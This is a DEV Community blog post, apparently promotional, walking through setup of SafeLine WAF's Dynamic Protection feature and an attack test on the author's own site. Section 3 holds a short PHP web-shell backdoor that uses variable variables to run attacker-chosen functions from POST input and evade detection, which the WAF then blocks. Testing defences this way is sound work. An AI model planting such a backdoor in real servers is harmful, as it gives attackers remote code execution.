DEV Community

Lulu
Lulu

Posted on

Real-World Attack Testing with SafeLine: A Guide to Dynamic Protection

1. Introduction to SafeLine

Since 2016, Chaitin Tech has been committed to making cybersecurity accessible to everyone. They initially open-sourced SafeLine's semantic analysis engine and have since released various plugins and communication protocols associated with SafeLine. In April 2023, Chaitin took it a step further by launching a free community edition of SafeLine on GitHub. This move allows more developers and companies to experience the power of SafeLine’s semantic analysis algorithms at zero cost, aiming to advance the development and application of intelligent semantic analysis in cybersecurity.

2. Experiencing Dynamic Protection

Introduction to Dynamic Protection
The Dynamic Protection feature is a significant update to SafeLine WAF, designed to offer more flexible and efficient security defenses. It provides comprehensive protection for web applications by monitoring in real-time and dynamically adjusting protection strategies.

Adding Protected Sites

  • After logging in, navigate to "Web Services" and click "Add Web Service."
    Image description

  • Enter the domain and port to be monitored, and in the upstream server field, input the internal address of your web server.
    Image description

Configuring Dynamic Protection Resources

  1. Go to the "Dynamic" configuration page from "Web Services."
    Image description

  2. Add the resources you want to protect by clicking "Select Resources" at the bottom right.
    Image description

Before and After Protection

  • Before Protection:
    Image description

  • After Protection:
    Image description

Dynamic Protection Review

As shown above, once you select the resources to protect, SafeLine informs you that the site is now protected by WAF. The original code on the page is replaced with obfuscated code, enhancing security significantly.

3. Attack Testing (Disclaimer: This was tested on my own site.)

Step 1: Constructing the Attack Code

I created a backdoor script that passes variables multiple times. Normally, this code wouldn't trigger any alarms. I then uploaded it via the web to see if SafeLine would detect it:

<?php 
$username = $_POST['username']; 
$password = $_POST['password']; 
$shell = "username"; 
$variable = $password; 
@$$shell($variable); 
?>
Enter fullscreen mode Exit fullscreen mode

Step 2: Upload Test

It quickly became clear that my upload operation failed. A quick check revealed that SafeLine had intercepted the upload.

Image description

Step 3: Backend Check

In the SafeLine dashboard, I could see that my site was under attack. The protection was solid, clearly marking the attacker's IP, logging the attack details, and even providing AI analysis options.

Image description

Image description

4. Relevant Links

Official Website: https://waf.chaitin.com

GitHub: https://github.com/chaitin/SafeLine

Top comments (0)